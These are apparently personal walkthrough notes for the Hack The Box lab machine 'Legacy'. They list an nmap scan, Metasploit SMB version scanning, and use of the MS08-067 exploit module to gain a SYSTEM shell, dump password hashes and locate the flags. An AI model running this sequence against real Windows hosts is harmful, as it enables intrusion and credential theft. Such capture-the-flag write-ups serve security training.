Legacy
HTB - 1. Legacy
- 1.
nmap -A -T4 -p- 10.10.10.4
shows 139 and 445 open, running Windows XP, computer name LEGACY, message_signing disabled. - 2.
smbclient -L \\10.10.10.4\\
no connection - 3.Metasplotsudo msfconsolesearch smb_versionuse auxiliary/scanner/smb/smb_versionoptionsset rhosts 10.10.10.4exploitResult: running Windows XP SP3
- 4.Search
smb windows xp sp3 exploit
found https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi - 5.Metasplot Exploituse exploit/windows/smb/ms08_067_netapiset rhosts 10.10.10.4rungetuidsysinfohelphashdumpshellResult: shell spawned at NT AUTHORITY\SYTEM (root equivalent)
hashdump
gives password hashes Admin Flag atC:\Documents and Settings\Administrator\Desktop\root.txt
User Flag atC:\Documents and Settings\john\Desktop\user.txt
Last modified 9mo ago